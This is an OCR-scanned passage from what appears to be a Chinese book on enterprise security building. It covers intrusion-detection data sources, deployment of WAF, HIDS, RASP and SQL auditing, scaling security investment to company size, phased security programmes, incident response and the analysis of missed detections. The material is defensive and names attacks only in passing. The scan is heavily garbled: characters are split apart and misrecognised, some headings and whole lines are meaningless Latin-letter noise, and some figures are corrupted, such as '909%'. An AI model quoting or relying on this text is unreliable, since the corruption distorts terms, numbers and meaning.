除了 WAF 之 外 似乎 束 找 不 到 太 多 的 带 有 强 阻 断 性 质 的 安全 产品 了 ， 所 
以 最 后 给 人 留 下 一 个 除了 WAF 剩 下 的 都 是 检测 类 安全 产品 的 印象 。 客 
观 一 点 说 ， 如 有 果 你 熟悉 甲 方 的 安全 建设 ， 阻 断 也 并 不 只 有 WAF 这 个 单 
一 的 角色 ， 所 谓 防 护 是 由 一 系列 手段 合 加 后 的 效 末 ， 包 括 但 不 仅 限于 
如 下 手段 : 


.安全 域 划分 /VPC/VLAN 隔 离 。 
:OS 加 国 ， 比 如 目录 的 wrx 权 限 ，cgroup+namespace+chroot ° 
.最 前 端的 抗 DDoS 防护 。 


4 层 防 火 墙 的 过 滤 。 


终 检 测 手段 表现 为 一 个 个 相对 独立 的 产品 形态 ， 而 防护 则 更 多 
以 零散 的 手段 分 布 于 各 处 。 


1 .数据 流 视角 


在 理论 篇 中 提 到 过 大 型 互联 网 入 侵 感 知 和 防御 体系 的 思路 类 似 于 
从 各 个 维度 采集 数据 然后 用 大 数据 (包含 机 器 学 习 的 方式 ) 最 终生 成 
攻击 告警 信息 。 图 16-1 展 示 了 篆 见 的 入 侵 感 知 数据 源 采 集 的 维度 ， 对 应 
的 是 生产 网 络 环境 ， 而 非 办 公 网 络 环境 。 


静态 规则 
传统 BI 应 对 数据 规模 问题 
内 核 态 检测 机 器 学 习 
用 户 态 检测 ( 进 ` 以 检测 异常 为 思路 
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图 16-1 第 见 入 侵 感 知 数据 源 采 集 的 维度 


这 些 数据 维度 包括 ; 


1) 网 络 (安全 ) 设备 : 防火 墙 、WAF、NIDS， 在 大 型 IDC 环 境 
中 这 些 产品 的 形态 可 能 不 一 定 是 “盒子 ”， 而 是 分 布 式 软件 ，module 或 
agent 的 形式 。 


2 


NE 


OS: : HIDS 数 据 ， 系 统 原 生日 志 ， 以 及 应 用 层 日 志 。 


3) 运行 时 环境 : 例如 JVM、Zend 等 解释 器 的 定制 日 志 ， 在 形式 上 
它 也 属于 OS 层面 可 以 采集 的 数据 。 


Pca 


4) 数据 层 : 对 应 的 是 数据 库 、 缓 存 以 及 大 型 的 分 布 式 数据 库 中 间 
件 代理 所 产生 的 访问 和 安全 告警 。 


5) 漏洞 信息 : 由 网 络 扫 搞 万 或 主机 本 地 agent 搜 集 的 漏洞 信息 。 


6) 资产 和 配置 管理 数据 : iplist 等 属于 基础 数据 ， 如 果 这 类 数据 不 
正确 ， 对 于 多 维度 数据 关联 以 及 发 现 问题 后 的 处 理 流程 都 有 很 大 的 障 
Ee 


这 张 图 里 没有 标识 出 来 的 实际 上 还 有 另外 一 部 分 : 第 三 方 威胁 情 
报 数据 〈 例 如 了 王 信誉、 恶意 域 名 和 灰色 URL 等 ) 。 但 据 笔 者 观察 ， 大 
多 数 企 业 的 安全 建设 还 没有 成 熟 到 对 常规 维度 的 数据 榨 干 的 地 步 ， 所 
以 威胁 情报 这 部 分 通 利 没有 被 放 在 紧急 且 重 要 的 位 置 。 


2A ae LAA 


从 更 加 具体 化 的 服务 器 部 署 视角 来 看 ， 以 Web 服 务 环境 下 的 各 个 功 
能 服务 器 为 例 ， 描 述 安全 产品 部 署 的 选择 性 问题 ， 因 为 并 不 是 所 有 的 
服务 器 都 需要 千篇一律 地 部 署 所 有 的 安全 产品 。 


图 16-2 是 一 个 抽象 的 大 中 型 web 服务 架构 ， 通 常 SLB 软 件 负载 均衡 
(7 层 ) 可 能 会 同时 充当 一 些 WAF 的 角色 ， 需 要 装载 对 应 的 WAF 模 块 和 
人 机 识别 模块 (采集 业务 安全 数据 ) ， 后 端的 App server 应 用 服务 器 ， 
例如 Java 或 PHP 或 node.js 等 本 身 首先 是 一 个 Linux OS 环境 ， 需 要 HIDS 主 
机 层 的 入 侵 检测 ， 其 次 因为 有 应 用 跑 在 上 面 ， 所 以 需要 RASP 运 行 时 环 
境 的 沙 箱 模块 ， 一 般 情 况 下 还 需要 一 个 大 数据 日 志 采 集 的 agent 用 于 收 
集 系统 和 应 用 层面 的 实时 日 志 (Flume 是 一 款 流 行 的 大 数据 agent) ， 
HIDS 所 采用 的 数据 通道 和 Flume 是 否 通过 自 研 手段 合并 成 一 个 agent 并 
不 是 这 个 问题 的 关键 ， 这 里 是 用 来 说 明 需 要 实现 哪些 功能 。 再 后 面 的 
中 间 件 不 是 一 个 直接 对 外 暴露 的 服务 ， 更 多 关注 系统 的 自身 状态 是 否 
存在 入 侵 可 疑 ， 所 以 需要 HIDS 和 一 个 大 数据 日 志 收 集 agent， 如 果 后 端 
是 关系 型 数据 库 ， 使 用 的 是 非 私有 SQL 协议 ， 则 可 以 在 这 里 加 载 SQL 审 
计 模 块 〈 形 式 上 可 能 是 挂 在 劳 路 ) ， 如 果 使 用 的 是 私有 协议 ， 则 可 以 
考虑 把 SQL 审计 改 成 接口 调用 审计 。 最 后 面 的 数据 库 关 注 的 也 是 操作 
系统 本 身 是 否 被 渗透 ， 同 样 也 是 一 个 HIDS 和 一 个 大 数据 的 agent。 通 过 
这 些 不 同 功能 服务 器 上 的 数据 采集 点 ， 构 成 入 侵 感 知 的 数据 来 源 。 
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图 16-2 ”大 中 型 Web 服 务 架 构 示 意图 
3.IDC 视 角 


古人 否 涉 及 这 个 视角 纯粹 取决 于 规模 ， 业 务 规模 稍微 大 一 点 束 会 目 
然 率 扯 到 跨 IDC， 跨 全 球 区 域 这 些 问 题 。 安 全 感知 对 应 的 技术 架构 也 会 
随 业 务 形态 产生 相应 的 变化 。 具 体 到 实现 一 般 是 “跟随 ” 运 维基 础 架 
构 ， 运 维 如 果 是 采用 多 中 心 分 治 原则 ， 则 安全 的 数据 也 不 会 刻意 追求 
到 最 终 的 汇聚 点 进行 聚合 。 但 一 般 情 况 下 ， 为 了 兼顾 多 维度 数据 关联 
的 准确 性 ， 会 使 用 多 级 日 志 案 合 到 一 个 中 心计 算 节 点， 如 图 16-3 所 示 ， 
在 最 终 数据 集 上 生成 攻击 检测 告警 。 


对 于 涉及 敏感 国家 和 地 区 受 限于 数据 保护 遵从 与 合 规 性 需求 时 ， 
可 适当 采用 区 域 分 治 原则 ， 使 所 在 region 的 安全 大 数据 在 本 region 内 计 
算 完毕 ， 不 跨 region 传 输 。 


4. 逻 辑 攻防 视角 


从 抽象 的 纯 攻 防 视角 如 图 16-4 所 示 ， 对 于 企业 的 生产 网 络 而 言 ， 最 
外 围 的 威胁 如 下 : 1) 4 层 流 量 型 DDoS; 2) DNSH; 3) 链 路 劫持 。 
对 应 最 外 层 的 主要 防御 手段 是 抗 DDoS。 
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本 地 日 志 聚合 
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图 16-3 IDC 视角 


Ali6-4 逻辑 攻防 视角 


抗 DDoS 之 后 的 第 一 道 防御 模型 是 快速 收敛 入 口 ， 减 小 攻击 面 ， 通 
常 的 手段 是 4 层 防火 墙 ，5 元 组 ACL 过 滤 或 利用 Web 服 务 的 反 向 代理 只 对 
外 开放 TCP 80 等 主要 服务 端口 ， 其 余 全 部 对 互联 网 禁止 。 


在 4 层 协议 过 滤 之 后 ， 攻 防 模 型 进入 第 7 层 应 用 层 协 议 对 抗 ，1) 
HTTP/HTTPS 协 议 ， 防 御 手 段 是 WAF; 2) 非 HTTP 协 议 ， 主 要 使 用 
NIDS， 在 节约 成 本 的 前 提 下 也 可 以 省 略 这 个 措施 转 而 采用 服务 加 固 和 


强 审 计 的 方式 做 受 协 方案 3) CC 等 7 层 DDoS 攻 击 ， 使 用 7 层 的 抗 DDoS 
做 人 机 识别 ， 通 常 是 类 似 WAF 的 软件 模块 。 


在 7 层 协议 的 更 后 端 是 应 用 代码 的 运行 时 状态 ， 这 个 层次 比 7 层 的 
CGI 更 底层 ， 在 比较 大 规模 的 生产 环境 中 ， 一 般 以 检测 webshell 为 主 ， 
在 小 规模 环境 下 可 以 采取 相对 重度 的 方式 用 RASP 模 块 检测 OWASP 
TOP 10 漏 洞 中 的 大 多 数 类 型 。 


再 往 后 的 攻击 模型 ， 介 于 应 用 层 攻击 到 系统 层 攻击 之 间 ， 包 括 : 
直达 数据 库 的 恶意 攻击 (SQL 注 入 或 拖 库 ) ，SSH 的 暴力 破解 ， 直 接 调 
用 系统 命令 但 仍 未 获得 完全 系统 权限 的 webshell 指 令 执行 ， 对 应 的 防御 
模型 抽象 为 SQL 审 计 、 系 统 日 志 分 析 、webshell 检 测 。 


FED EN AC, Bla EB RA ERA ODOR, Pale 
型 则 是 检测 担 权 和 rootkit， 对 应 的 解决 方案 通 币 是 HIDS 的 功能 。 到 这 
里 基本 完成 了 入 侵 过 程 的 全 部 对 抗 。 虽 然 从 攻击 的 角度 看 攻击 还 没 
完 ， 但 后 面 的 横 同 渗透 等 攻击 所 对 应 的 防御 模型 也 基本 部 泣 盖 在 前 述 
的 层次 逻辑 之 中 。 


16.2 AEH RABY 


以 上 “全 套 ? 设 计 对 于 大 多 数 企 业 而 言 还 是 太 贯 了 ， 在 业务 规模 和 
安全 投入 没有 达到 理想 化 水 平 之 前 ， 只 能 做 一 些 妥 协和 裁 蔓 ， 但 是 这 
种 裁剪 还 是 要 追求 有 限 安 全 总 投入 〈 钱 、 人 员 编制 ， 内 部 文 撑 团 队 ) 
水 平 下 的 最 大 安全 效果 。 


1.IDC 规 模 大 小 的 区 别 


对 裁剪 影响 最 大 的 便 是 IDC 规 模 ， 因 为 它 决 定安 全 的 总 投入 。 极 
端 一 点 说 小 网 站 弄 个 modsecurity 或 naxsi， 装 个 OSSEC 束 完事 了 ， 哪 还 
用 得 着 这 么 复杂 。 然 而 对 于 绝 大 多 数 既 称 不 上 海量 ， 双 不 那么 小 的 平 
台 来 说 ， 可 以 有 很 多 省 钱 的 渠道 ， 比 如 : 


1) 4 层 抗 DDoS 的 成 本 很 高 ， 不 一 定 要 上 自己 去 建 这 种 能 力 ，7 层 抗 
DDoS 也 可 依赖 于 第 三 方 ， 仅 仅 是 不 要 对 效果 有 过 分 的 期 望 。 


2) 如 果 没 有 条 件 做 网 络 分 光 ， 那 就 干脆 乐 了 这 事 吧 ， 扫 描 器 
+Web 日 志 分 析 也 能 项 用 。 


3) 上 自 研 Hids 是 奢侈 品 ， 如 果 你 的 公司 市 值 尚 未 超过 100 亿 美元 ， 
建议 还 是 用 现成 的 开源 产品 ， 比 如 OSSEC 或 者 OSquery 。 


4) RASPtHie S22 m, GP Pai Be MAR KWA Fie EL BER 
地 利用 ， 束 不 要 去 弄 RASP 了 ， 当 然 规 模 比 较 小 ， 对 并 发 性 能 要 求 不 奇 
刻 的 业务 环境 ， 人 花 钱 买 商业 产品 也 是 一 种 思路 。 


5) SQL 审计 也 有 点 小 奢侈 ， 如 采 你 在 CGI 层 能 有 比较 大 的 目 信 和 解 
决 SQL 注入 问题 ， 那 也 可 以 忽略 这 个 产品 。 


2. 不 同 的 业务 类 型 


如 果 业 务 流量 中 大 部 分 都 是 HTTP 类 型 的 ， 那 么 应 该 重点 投入 
WAF、RASP 和 Web 扫 描 器 ，NIDS/NIPS 可 以 省 略 ， 如 果 有 条 件 搞 
HIDS， 应 该 优先 关注 用 户 态 检测 ， 比 如 webshell 和 提 权 。 


如 果 非 HTTP 协 议 例 如 SSH、MySQL 等 通用 协议 而 非 私 有 协议 占 
多 数 ， 网 络 的 部 分 可 以 考虑 NIDS， 数 据 库 部 分 可 以 使 用 SQL 审计 。 如 
果 消 息 接 口 、 远 程 过 程 调 用 、 数 据 缓存 和 持久 化 中 私有 协议 占 多 数 ， 
则 不 用 考虑 NIDS 和 SQL 审计 ， 而 应 转向 HIDS， 私 有 协议 对 入 侵 者 来 
说 是 一 道门 槛 ， 被 渗透 的 概率 不 高 ， 所 以 更 多 关注 操作 系统 本 身 就 
行 。 对 于 大 量 的 非 Web 业 务 ， 例 如 很 多 存储 节点 ， 也 只 需要 关注 操作 
系统 的 入 侵 ， 更 多 的 在 HIDS 上 投入 ， 重 点 在 后 门 程序 和 Rootkit 检 测 。 


3. 安 全 感 的 底线 


论 如 何 追 求 性 价 比 ， 安 全 感 总 古 有 一 个 底线 的 ， 在 生产 网 络 的 
aE HEH, I NRE: 


1) 入 侵 者 能 随意 操纵 数据 库 / 用 户 数据 (不 一 定 需 要 数据 库 权 
限 ， 也 不 一 定 需要 系统 的 root 权 限 ) 。 


Bi 


2) 渗透 到 达 了 操作 系统 这 一 层 (得 到 shell 了 ， 无 论 是 普通 用 户 ; 


是 root) 


作为 防御 方 我 一 是 要 对 上 壕 两 种 情况 有 所 掌控 ， 最 起 码 在 这 两 个 
环节 上 具备 一 定 的 入 侵 感知 能 力 ， 不 至 于 发 生 了 如 此 严重 的 事情 还 是 
没有 半点 告警 。 对 应 在 整体 方案 上 无 论 如 何 裁剪 ， 在 安全 团队 的 能 力 
不 是 特别 惨淡 的 情况 下 ， 还 是 尽 可 能 地 在 数据 库 〈 或 DAL， 数 据 访问 
FE) 和 主机 这 两 个 层面 设防 。 


第 17 章 “分 阶段 的 安全 体系 建设 


理论 篇 中 提 过 安全 体系 建设 是 一 个 分 阶段 逐步 推进 的 过 程 ， 


束 这 一 过 程 应 如 何 分 解 以 及 分 解 后 的 重要 部 分 展开 描述 。 


17.1 Awe 


企业 的 安全 体系 建设 是 一 个 从 “0” 到 “1” 的 过 程 ， 这 种 过 程 采用 分 步 
走 战略 ， 图 17-1 展 现 了 安全 整体 建设 的 “次 第 ” 。 


在 纵深 防御 建立 起 来 之 前 ， 征 不 是 被 动 换 打 呢 ， 显 然 不 是 的 。 你 
需要 做 一 些 基 础 的 事情 ， 最 大 化 的 止 换 ， 虽 然 有 些 事情 看 起 来 很 向 
单 ， 却 往往 是 安全 事件 的 根源 。 所 以 第 一 阶段 是 基础 安全 策略 的 实 
施 ， 这 一 部 分 看 上 去 不 那么 高 大 上 ， 却 是 ROI 最 高 的 部 分 。 这 一 部 分 大 
多 属于 整改 项 ， 不 需要 太 多 额外 的 投入 就 可 以 规避 80% 的 安全 问题 ， 即 
使 一 个 企业 没 太 多 安全 预算 ， 做 不 到 全 线 业务 实时 入 侵 感 知 ， 也 能 
一 个 撒 线 的 基础 保障 ， 这 一 阶段 总 体 上 属于 "“ 场 不 死 ”。 


第 二 阶段 是 进入 系统 性 建设 ， 也 就 是 第 二 篇 中 涉及 的 各 个 维度 的 
安全 防御 手段 。 入 侵 检测 等 ， 除 了 技术 上 ， 还 包括 流程 和 审计 需求 。 
这 是 一 个 相对 体系 化 的 锥 形 ， 对 于 不 是 特别 大 的 互联 网 公司 而 言 ， 开 
源 软件 + 商业 解决 方案 一 般 可 以 应 付 。 在 这 个 阶段 ， 如 果 对 象 是 大 型 互 
联网 公司 ， 则 应 该 直接 进入 自 研 之 路 ， 同 步 开 始 研 发 安全 产品 ， 例 如 
HIDS、 大 数据 平台 等 ， 目 研 迟 早 是 一 个 无 法 回避 的 现实 需求 。 
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安全 运营 


图 17-1 ”安全 整体 建设 的 框 染 


第 三 阶段 ， 系 统 化 建设 ， 安 全 运 维和 SDL 成 体系 之 后 ， 可 以 选择 
性 关注 业务 安全 的 问题 。 通 常 以 账号 安全 为 切入 点 ， 之 后 选择 主 营 业 
务 中 风险 最 大 的 全 流程 活动 做 相关 的 业务 风险 分 析 和 业务 风 控 体系 建 


当 安 全 运 维 、 产 品 安全 (SDL) 、 业 务 安全 都 初步 成 体系 之 后 是 
AS 
全 


不 是 安全 的 整体 建设 就 算 完了 呢 ? 显然 不 是 。 有 这 些 点 和 面 只 能 说 是 
有 了 骨架 ， 顶 多 只 能 算 一 层 厚薄 不 均 的 防御 网 ， 注 弱点 仍然 容易 被 罕 


透 ， 因 此 接 下 来 的 工作 是 进入 运 膏 环 入 ， 也 束 是 所 请 的 PDCA 的 工作 ， 
把 每 一 个 防御 点 打磨 到 极致 。 这 一 部 分 工作 很 重要 ， 但 属于 非 前 台 可 
见 的 “内 功 ”， 可 能 不 容易 受到 管理 者 的 重视 ， 但 安全 的 Leader 目 己 要 清 


楚 利 害 关系 ， 如 何在 这 部 分 工作 投入 资源 和 量化 对 应 的 KPI 产 出 是 需要 
考虑 的 问题 。 


最 后 一 个 层次 ， 当 以 上 点 和 面 的 建设 都 打磨 得 差不多 的 时 候 ， 安 
全 建设 进入 “ 目 由 发 挥 区 间 ”， 这 个 区 间 做 的 事 往往 跟 平台 的 经 营 状 
况 ， 业 务 的 市 场地 位 ， 业 务 的 全 球 化 属性 有 很 大 的 关系 ， 已 经 无 法 给 
这 个 区 间 的 事情 贴 标 丛 ， 但 也 有 一 些 可 遵循 的 参考 物 ， 比 如 对 标 业 界 
领导 厂商 。 


对 整体 的 建设 次 第 有 了 大 致 的 介绍 后 ， 下 面 对 一 些 关 键 环 世 做 进 


一 步 搬 述 。 


17.2 jee eM 


以 下 列举 了 一 些 和 常见 的 安全 诉求 ， 最 初始 的 阶段 都 需要 解决 这 些 


问题 。 


1) 资产 管理 的 灰色 地 市 (例如 ， 资 产 管理 系统 数据 不 准确 ， 运 维 
和 安全 都 不 知道 线 上 有 某 个 了 P， 遗 漏 了 安全 检查 和 监控 ， 一 批 新 采购 
的 服务 器 因为 业务 侧 的 紧急 扩容 需求 急 急忙 忙 上 线 ， 汤 掉 了 安全 扫 
描 ， 诸 如 此 类 的 ) 。 


2) 安全 措施 的 覆盖 率 和 健康 状态 ， 例 如 HIDS 的 安装 覆盖 率 ， 边 
IDC T AW MRS eee a: 即使 有 ， 有 十 不 是 在 运行 状态 ， 还 是 agent 


down 了 也 不 知道 。 


3) ACL 的 有 效 性 。 例 如 ， 为 调试 某 个 应 用 开 了 条 临时 策略 ， 事 后 
SAWCT; iptables 的 规则 因为 各 种 未 知 的 原因 突然 失效 了 ， 导 致 全 
端口 可 访问 。 

这 些 问题 涉及 配置 管理 、 上 下 线 流程 、 安 全 监控 的 范畴 ， 所 以 在 


流程 和 技术 上 部 需要 审查 。 男 一 方面 即使 有 了 流程 也 不 完全 可 依赖 ， 
因为 基于 人 的 流程 是 会 犯错 的 ， 基 于 机 器 的 流程 才 稍 微 可 信和 点 。 举 个 


例子 ， 公 司 定义 了 业务 发 布 前 的 上 线 安全 检查 这 个 流程 ， 但 是 业务 方 
在 发 布 前 起 记 知 会 到 安全 部 门 漏 挥 了 这 个 环 太 ， 最 后 还 是 一 个 坏 的 结 
果 ， 安 全 问题 往往 因为 这 种 低级 错误 ， 而 并 非 是 因为 没有 高 大 上 的 入 


受 感知 。 


第 二 阶段 : 
1) 清理 远程 登录 弱 口 令 。 


2) 清理 Web 应 用 : SQL 注入 、 文 件 上 传 点 ，struts2 等 RCE 漏 洞 ， 
管理 后 台 对 外 ， 管 理 后 台 弱 口令 ， 统 计 第 三 方 开源 Web 程 序 如 discuz! 
的 版 本 及 其 对 应 漏洞 。 


3) 清理 服务 端口 ， 姐 点 不 必要 的 服务 和 协议 ， 排 查 高 危 关口 。 


解决 了 上 述 问 题 ， 再 投入 或 者 同步 进行 纵深 防御 + 入 侵 感 知 体系 
建设 ， 才 会 事半功倍 。 


17.3 ”建立 应 急 啊 应 能 


以 下 分 别 从 组 织 、 流 程 、 近 术 体 系 三 方面 解释 互联 网 企业 的 应 急 


响应 能 力 (SRC) ， 参 见 图 17-2 ° 
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图 17-2 ”应急 啊 应 能 力 
1. 组 织 


有 SRC，SRC 不 只 是 一 个 提交 漏洞 给 奖励 反馈 的 平台 ， 更 是 一 个 黑 
日 两 道 关系 维系 的 渠道 ， 有 了 关系 渠道 ， 就 能 在 第 一 时 间 有 偿 获 知 
(威胁 情报 是 一 个 概念 ， 实 际 上 就 是 有 价值 的 信息 ) ， 这 种 情报 不 一 
定 是 机 器 可 读 的 OC， 很 可 能 就 是 一 句 话 “你 们 的 xx 系 统 已 经 被 黑 了 ， 


你 们 回去 查 一 下 ”， 现 在 SRC 的 模式 更 是 玩 出 了 人 民 战 争 的 味道 ， 要 发 
动 一 切 资 源 举报 威胁 信息 。 较 成 熟 的 SRC 团 队 还 做 一 件 事 情 ， 漏洞 根 
办 和 影响 面 分 析 ， 再 后 面 的 流程 SRC 团 队 基 本 不 再 干预 。 


3 个 典型 职能 部 门 是 : 运 维 、 产 品 开发 团队 、 安 全 部 门 中 的 防御 体 
系 建设 小 组 ， 下 面 是 这 三 个 部 门 的 工作 分 工 : 


1) 运 维 团 队 负 责 跟 系统 、 数 据 库 、 中 间 件 、 网 络 基 础 以 构 相 关 的 
让 本 和 配置 更 改 鸭 具体 实施 工作 ， 例 如 第 三 方 开源 服务 贸 软 件 Nginx、 
OpenSSL、MySQL 的 漏洞 。 


2) 产品 团队 负责 产品 相关 的 代码 级 别 的 漏洞 修复 (如 有 果 是 自己 开 
发 的 产品 的 漏洞 ) 。 


3) 安全 防御 体系 建设 小 组 负责 在 相关 的 入 侵 感知 体系 中 update 对 
应 该 漏洞 的 检测 规则 。 


2. 流 程 


1) 一 般 性 的 漏洞 跟 普 通 的 bug 修复 流程 一 样 ， 由 安全 部 门 接口 转 
交 业 务 线 接口 ， 之 后 由 业务 部 门 修复 后 提交 新 版 本 进行 发 布 ， 遵 循 的 
就 是 普通 DevOps 发 布 流程 ， 并 无 特殊 之 处 。 至 于 漏洞 本 身 的 “修复 - 验 
证 -发 布 -监控 ?等 PDCA 的 流程 溯 兰 在 DevOps 之 中 ， 跟 普通 的 版 本 发 布 
征 一 样 的 。 


2) OPEC BE ERA, GRAY EES RAE + Pm ARBER 
Leader 组 织 一 个 会 议 ， 制 定 专 门 的 漏洞 修补 和 应 急 计划 。 在 这 个 场景 
下 ， 关 键 角色 到 场 的 临时 会 议 效 末 远 大 于 制定 一 个 流程 ， 流 程 可 以 
有 ， 但 不 古 重 点 。 形 象 一 点 说 明 ， 上 午 开会 制定 计划 ， 中 午 实施 发 
布 ， 晚上 持续 监控 ， 可 能 一 天 束 完 事 了 ， 其 过 程 主要 是 还 是 参考 TTIL 
等 做 一 些 风险 规避 措施 。 


3) SLA 一 一 根据 漏洞 类 型 和 影响 程度 决定 ， 一 般 性 的 漏洞 也 不 必 
连夜 修复 。 高 危 漏洞 ， 有 实际 攻击 面 的 会 连夜 赶 工 ， 高 危 漏 洞 全 网 
push 补 本 可 要 求 在 24 小 时 内 完成 ， 总 体 上 认为 这 个 指标 跟 目 动 化 运 维 
能 力 有 关 ， 但 是 确认 影响 面 和 受害 范围 仍 属于 安全 的 职责 。 


4) 假如 短 时 间 内 无 法 修复 ， 使 用 临时 规避 措施 ， 前 端 设备 提 
供 “ 虚 拟 补丁 " 即 一 条 针对 该 漏洞 的 阻 断 规则 (前 提 是 有 这 种 能 力 ) ， 
或 者 短期 内 关闭 某 些 功能 ， 添 加 访问 控制 手段 作为 临时 规避 措施 。 


3. 技 术 


1) 发 现 得 快 依 赖 于 入 侵 感知 体系 ， 从 HIDS、RASP、WAF、SQL 
审计 等 各 个 维度 ， 这 是 互联 网 安全 防护 体系 的 核心 。 


2) 修得 快 则 依赖 于 持续 集成 和 上 自动 化 发 布 工具 的 文 持 ， 开 发 人 员 
如 何 一 链 发 布 ， 属于 互联 网 公司 每 天 的 日 第 活动 ， 这 个 能 力 依赖 于 开 


发 工具 、 运 维 工具 建设 ， 职 责 上 跟 安 全 没有 直接 关系 却 对 漏洞 的 修复 
效率 产生 潜在 的 影响 。 


3) 同样 ， 自 动 化 运 维 能 力主 要 属于 运 维 的 职责 ， 但 也 会 影响 漏洞 
修复 和 安全 策略 实施 的 效率 。 


总 结 一 下 ， 实 际 上 有 3 件 事 : 1) 发 现 的 快 ，2) 修 的 快 ，3) 修 不 
临时 规避 。 


17.4 jen 


很 多 人 以 为 某 一 个 漏洞 没 检 测 出 来 或 者 某 一 个 检测 手段 不 够 深入 
解决 起 来 都 很 简单 ， 确 实 站 在 单 点 技术 的 角度 ， 如 果 仅 从 攻 与 防 来 看 
可 能 不 是 很 难 ， 但 问题 在 于 场景 切换 到 大 规模 的 服务 右 网 络 ， 这 个 问 


题 的 解 会 复杂 化 。 


首先 是 覆盖 率 的 问题 ， 入 侵 检 测 手段 的 demo 往 往 只 占 30% 的 工作 
量 ， 通 过 生产 环境 的 性 能 和 可 用 性 要 求 ， 并 且 灰 度 推广 到 全 网 达成 
909% 以 上 的 覆盖 率 ， 大 约 占 30% 的 工作 量 ， 而 防御 模型 本 号 的 优化 ， 
数据 质量 的 优化 ， 检 测 规则 的 优化 占 40% 以 上 的 工作 量 。 小 规模 的 
IDC 环 境 里 ， 安 全 产品 的 全 网 推广 可 能 是 一 瞬间 的 事情 ， 但 是 大 型 IDC 
环境 里 可 能 有 点 像 搬 VIP 积分 一 样 是 个 缓慢 的 过 程 ， 所 以 相当 于 比 小 
规模 IDC 环 境 多 出 一 道 安全 建设 的 “额外 环节 ”。 而 防御 模型 的 优化 这 
个 过 程 ， 在 一 个 单 点 的 技术 环境 下 也 许可 以 浓缩 为 一 条 规则 的 优化 ， 
但 是 在 大 规模 IDC 下 却 衍生 出 很 多 问题 ， 变 成 了 一 套 PDCA 的 方法 论 。 
从 这 两 个 角度 看 ， 规 模 大 了 以 后 问题 都 会 复杂 化 ， 相 对 应 的 方法 也 会 
不 同 。 下 面具 体 分 析 防 御 模 型 优化 这 件 事 。 


图 17-3 是 可 以 作为 漏 报 的 根 因 分 析 流 程 ， 防 御 体 系 建设 的 一 大 过 
程 就 是 跟 逃 逸 和 绕 过 既 有 的 安全 策略 做 对 抗 ， 如 果 一 个 安全 事件 没有 


发 现 ， 攻 击 者 获得 了 权限 但 所 有 的 安全 机 制 都 没 产 生 告 警 ， 那 就 要 人 退 
WHAM, BWA TE, FOTIA MBIA, TAF 
有 以 下 几 个 环节 。 


漏 报 ? 

单 点 检测 深度 不 足 ? 
选取 的 检测 维度 不 够 
覆盖 率 不 足 ? 
安全 产品 的 可 用 性 ? 
数据 质量 ? 

人 的 问题 ? 

图 17-3， 漏 报 的 根 因 分 析 流程 


首先 ， 单 点 的 检测 手段 不 足 是 绝 大 多 数 人 都 会 想到 的 ， 可 能 是 检 
测 规则 写 得 不 够 好 ， 对 某 些 情况 没有 考虑 到 ， 补 充 相关 场景 的 检测 规 
则 即 可 。 例 如 只 做 了 rootkit 检 测 ， 而 没有 考虑 诸如 “不 利用 任何 第 三 方 
可 执行 文件 实现 的 反弹 shell”* 就 属于 这 一 类 情况 。 


B, ATM EMR Ale, ABA AT BEAR Al ce A EE 
AST NE CTE SEE, Be ERE ECHR IT, A 
By) ee BES | A ERASE ERT EC, BRA BEC MHSQLIEA, Æ 
CGI 层面 要 对 抗 HITP 编 码 问 题 ， 单 维度 的 WAF 数 据 还 不 够 ， 可 能 需要 
从 SQL 层 引 入 第 二 层 检测 ， 两 个 维度 县 加 后 出 结 末 。 更 常见 的 webshell 
则 有 很 多 维度 。 


第 三 ， 在 大 型 互联 网 中 ， 单 点 的 深度 和 检测 维度 都 没有 问题 ， 而 
征 出 问题 的 机 套 上 还 没 安装 和 运行 相关 的 检测 产品 ， 全 网 的 部 车 多 兰 
率 才 50%， 剩 下 的 509% 在 这 几 个 维度 是 旬 莽 ， 所 以 被 人 拥 了 马蜂 坑 。 
这 个 问题 其 实 也 无 解 ， 只 有 加 速 提升 履 亩 率 。 反 过 来 说 ， 单 点 的 检测 
方案 再 美好 ， 因 为 影响 了 性 能 和 可 用 性 推广 不 了 ， 最 后 都 等 于 没有 。 
所 以 把 安全 的 功能 和 检测 能 力 放 在 第 一 位 的 方案 往往 不 是 最 优 解 。 


第 四 个 层次 ， 以 上 都 没 问 题 ， 但 是 安全 产品 本 号 处 在 亚 健康 状 
aS: 进程 挂 了 ， 模 块 挂 了 ， 数 据 同步 调 了 .…… 骤 后 的 结 末 天 是 出 问题 
时 正好 调 过 了 .…… 一 方面 可 能 是 因为 产品 本 身 的 健壮 性 比较 六， 帮 一 
方面 可 能 是 设计 不 够 好 ， 体 积 胱 肿 ， 垃 圾 数据 大 堆 ， 真 正 的 数据 利用 
率 很 低 。 


第 五 个 层次 ， 禾 盖 率 100%， 但 是 数据 质量 不 高 ， 导 致 的 误 报 很 
多 ， 有 价值 的 信息 也 被 淹没 了 。 质 量 不 高 有 两 层 含义 ， 第 一 层 数 据 源 
跟 检测 目标 的 相关 性 不 强 ， 传 统 的 SOC 里 采集 了 大 量 的 数据 ， 但 很 多 


信息 不 是 安全 强 相关 ， 也 不 足以 判断 到 研发 生 了 什么 ， 这 种 数据 束 没 
什么 用 。 比 如 防火 墙 的 日 志 里 一 大 堆 数 据 包 分 片 的 告警 ， 在 海量 的 环 
境 下 纯 属 垃圾 信息 。 第 二 层 合 义 是 模 类 告警 太 多 ， 很 多 中 低 风险 疑似 
触发 安全 策略 的 告警 ， 需 要 通过 手工 做 大 量 验证 ， 整 体 上 ROI 很 低 。 
人 有 习惯 效应 ， 告 警 刷 屏 多 了 又 不 是 亚 重 告警 ， 人 会 目 动 * 选 择 性 忽 
略 ”， 这 样 还 不 如 没有 。 


如 采 以 上 都 没 问 题 ， 那 最 后 只 有 两 种 可 能 ， 一 种 是 整体 安全 机 制 
存在 缺陷 ， 一 种 是 人 为 的 解读 能 力 缺失 ， 或 者 是 人 的 事件 处 理 流 程 上 
存在 问题 。 整 体 机 制 的 问题 涉及 推倒 重 来 ， 是 一 个 很 大 工程 ， 这 个 必 
须要 由 安全 负责 人 去 决策 。 人 的 问题 ， 一 方面 需要 提升 对 攻防 的 认 
知 ， 一 方面 需要 改进 流程 和 过 程 方法 论 。 


以 上 全 部 闭环 后 通 冲 能 在 一 轮 又 一 轮 时 旋 式 的 欠 代 中 不 断 地 改进 
既 有 安全 体系 的 能 力 ， 所 谓 十 年 攻防 积 素 很 多 都 是 背后 看 不 见 的 功 
夫 ， 这 将 占据 了 日 常 主要 的 工作 量 。 没 有 经 验 的 安全 人 负责 人 在 给 领导 
